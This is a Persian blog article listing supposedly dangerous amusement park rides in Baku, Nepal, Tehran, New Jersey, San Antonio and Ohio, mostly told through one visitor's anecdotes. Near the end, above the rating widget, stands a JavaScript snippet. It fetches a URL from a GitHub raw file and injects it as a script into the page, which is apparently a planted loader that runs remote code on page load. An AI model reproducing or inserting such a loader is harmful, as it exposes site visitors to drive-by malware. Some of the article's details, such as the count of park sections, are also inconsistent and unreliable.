خطرناک‌ ترین شهر بازی های دنیا

  • آیا شما هم جزو کسانی هستید که با شنیدن نام شهر بازی، ترکیبی از ترس و هیجان را در وجود خود حس می‌کنید؟ شهربازی همان جایی است که اسباب شادی و سرگرمی افراد را فراهم می‌کند. بعضی از وسایل موجود در شهربازی های معمولی بوده و بعضی از آن بسیار ترسناک و هبجان‌انگیز هستند

    شهر بازی

    قطار ارواح خبیثه در باکو (آذربایجان)

    اغلب قطارهای وحشت دنیا قادر نیستند که مسافران بزرگسال را به وحشت بیندازند ولی در شهربازی باکو، قطاری وجود دارد که به نام قطار ارواح خبیثه شاخته می‌شود. فرقی ندارد که در چه رنج سنی باشید، این قطار شما را وحشت‌زده خواهد کرد. آقای وانزگر، ترس، رنج و درد را با هم در این قطار تجربه کرد. به گفته‌ وی: به این فکر کنید که قطار وحشتی سوار شده‌اید و کسی جز شما اطرافتان نیست. در حالی که چیزی را نمی‌بینید، به سمت جلو حرکت می‌کنید. به یک مرتبه از سمت بالا با پرده‌ای بزرگ و چسبناک مواجه می‌شوید و بینی و دهان شما را می‌پوشاند. هنگامی که قطار به طرف جلو می‌رود، دهان شما نیز دیگر کار نمی‌کند. پس از این اتفاق، آقای وانزگر شکایت خود را به مدیر شهر بازی اعلام کرد اما وی نه متوجه زبان وانزگر شد، نه توجهی به او کرد. وانزگر همچنین گفت: اوه مرد! تجربه خوبی نبود. برای کسی تجربه آن را آرزو نمی‌کنم.

    چرخ فلک بدبختی (نپال)

    توصیف آقای وانزگر از چرخ فلک بدبختی واقع در نپال به این صورت است که با یک چرخ و فلک معمولی روبه‌رو می‌شوید. زوج‌ها و خانواده‌ها سوار بر آن می‌شوند. بعد از آن، دکمه آخرین درجه و سرعت چرخ و فلک را فشار می‌دهند. چرخ فلک نپال، به این شکل کار می‌کند‌. تجربه کردن چرخ و فلک با سرعت کمی بالا برای بومیان هیمالیا امری عادی تلقی می‌شود. چرا که آن‌ها زیستن در ارتفاعات هیمالیا را خوب بلدند. با این حال آقای وانزگر عادت به سرعت بالا نداشت. به گفته او، این چرخ و فلک سرعت بالایی داشته و صدای جیغ و داد مردم از هر طرف به گوش می‌رسیده است.

    نابودگر گردن تهران (ایران)

    از دیگر شهربازی‌های خطرناک و پر هیجان جهان می‌توان به نابودگر گردن تهران اشاره کرد. سوار شدن بر ترن هوایی پارک ارم تهران، تجربه دردناکی را برای آقای وانزگر به دنبال داشت. این ترن هوایی، با سرعتی بالا و بدون چسبندگی به چیزی افراد را همچون پنبه جا به جا می‌کند. وی تجربه خود را این گونه بیان می‌کند: به هنگام اولین مواجه من با این قطار که کابین‌هایی همچون خودرو داشت، حدس می‌زدم که این قطار به من آسیب خواهد زد و حدسم درست بود. سه هفته را با گردن درد سپری کردم.
    کابین‌ها سر و صدای زیادی نیز تولید می‌کردند. ‌آقای وانزگر عقیده داشت که این ترن هوایی، باریک‌ترین ترن هوایی در طول تاریخ بشریت به حساب می‌آید. به شکلی که در طی مدت زمان حرکت قطار، شما قادر به تکان دادن سر خود نیستید و صدای فریاد افراد کل فضا را پر می‌کند.

    وسیله پر هیجان cannonball loop (ایالات متحده)  The Cannonball Loop

    و این سرسره آبی مرتفع و پر هیجان است که با چرخش های ۳۶۰ درجه ای خود برای هر کسی سرگیجه ایجاد خواهد کرد. این وسیله در پارکی در ایالت نیوجرسی قرار داشت که به خاطر حوادث بیشماری که برای مردم ایجاد کرد، اکنون بسته شده است. پس شما بسیار خوشبخت هستید که دیگر نمی توانید سواری آن را تجربه کنید.

    شهر بازی سیکس فلگز

    شهر بازی سیکس فلگز، در سن آنتونیو آمریکا واقع شده است. مساحت آن به ۸۱ هکتار می‌رسد. شهربازی سیکس فلگز، شامل پنج بخش به اسم‌های فستیوال‌های لس، دره کرکسل، اسپاسبرگ، راک‌ویل، گردشگاه خلیج فیستا و خلیج آب سفید در کنار یک پارک آبی می‌شود. نمایش‌هایی در این شهربازی به اجرا در می‌آیند که از معروفیت خاصی برخوردار هستند. این نمایش‌ها، در سال‌های ۱۹۹۹ تا ۲۰۰۸ موفق به کسب چندین جایزه شده‌اند. در این شهربازی، شما شخصیت‌های کارتونی زیادی را نیز می‌توانید ببینید. لونی تونز یکی از نمونه‌های این شخصیت‌های کارتونی است.

    گردباد شیطانی در اوهایو

    گردباد شیطانی پر هیجان ، در ایالت اوهایو واقع شده است. در گردباد شیطانی در اوهایو ، شما می‌توانید ترکیبی از یک سقوط پر هیجان و چرخش را همانند بک گردباد بزرگ تجربه کنید. بومیان آمریکا با گردبادهای بزرگ آشنا هستند. با این حال، چرخش‌های زیاد این ترن ترکیبی سبب می‌شود که احساس معلق بودن در یک گردباد را داشته باشید. 
    طراحی این وسیله، به سال ۹۰ میلادی برمی‌گردد. البته رونمایی از آن، بعد از سه سال صورت گرفت. مدتی بعد گردباد شیطانی را بازسازی نیز کردند. ‌این گردباد شیطانی در اصل از دو بخش بازی سقوط آزاد و ‌ترن هوایی ترسناک تشکیل شده است. تپش قلب را با این وسیله تجربه خواهید کرد. چرا که شما در ارتفاع ۶۶ متری قرار می‌گیرید. چرخش آن به صورت ۴۵۰ درجه و با سرعت ۱۱۰ کیلومتر بر ساعت انجام می‌گیرد و به سمت پایین حرکت می‌کند.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۴ از ۵
    از مجموع ۴ رای

    دیدگاهتان را بنویسید